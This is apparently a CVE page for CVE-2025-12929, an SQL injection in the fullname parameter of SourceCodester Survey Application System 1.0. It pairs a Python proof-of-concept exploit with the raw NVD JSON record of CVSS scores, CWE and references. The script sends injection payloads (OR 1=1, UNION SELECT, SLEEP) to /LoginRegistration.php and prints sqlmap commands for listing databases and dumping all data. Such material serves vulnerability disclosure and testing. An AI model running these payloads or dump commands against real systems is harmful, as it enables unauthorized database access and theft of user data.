CVE-2025-12929

import requests import sys # CVE-2025-12929 SQL Injection PoC # Target: SourceCodester Survey Application System 1.0 # Location: /LoginRegistration.php - save_user/update_user function # Parameter: fullname TARGET_URL = "http://target.com/LoginRegistration.php" def sql_injection_test(): """ Test for SQL injection vulnerability in fullname parameter """ # Basic SQL injection test payload payloads = [ "test' OR '1'='1", "test' UNION SELECT 1,2,3,4,5--", "test' AND SLEEP(5)--", "test' AND 1=1--", "test' AND 1=2--" ] headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print("[*] Testing SQL Injection vulnerability...") print(f"[*] Target: {TARGET_URL}") for i, payload in enumerate(payloads, 1): print(f"\n[*] Test {i}: {payload}") # Test save_user function data_save = { 'fullname': payload, 'action': 'save_user', 'username': 'testuser', 'email': '[email protected]', 'password': 'test123' } try: response = requests.post(TARGET_URL, data=data_save, headers=headers, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for SQL error indicators if 'sql' in response.text.lower() or 'error' in response.text.lower(): print("[!] Potential SQL error detected!") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] For detailed exploitation, use sqlmap:") print(f"sqlmap -r request.txt --level=5 --risk=3 -p fullname") def extract_data_with_sqlmap(): """ Generate sqlmap command for data extraction """ print("\n[*] Sqlmap commands for exploitation:") print("=" * 60) print("# Get database version") print(f'sqlmap -u "{TARGET_URL}" --data="fullname=test&action=save_user" -p fullname --batch --dbs') print("\n# Get current database") print(f'sqlmap -u "{TARGET_URL}" --data="fullname=test&action=save_user" -p fullname --current-db') print("\n# Dump all data") print(f'sqlmap -u "{TARGET_URL}" --data="fullname=test&action=save_user" -p fullname --dump-all') if __name__ == "__main__": sql_injection_test() extract_data_with_sqlmap()

{"cve": {"id": "CVE-2025-12929", "sourceIdentifier": "[email protected]", "published": "2025-11-10T04:15:41.943", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in SourceCodester Survey Application System 1.0. This impacts the function save_user/update_user of the file /LoginRegistration.php. Executing manipulation of the argument fullname can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. Other parameters might be affected as well."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oretnom23:survey_application_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC838E1E-FAEC-4100-8364-41B7D342A010"}]}]}], "references": [{"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.331649", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331649", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.681746", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}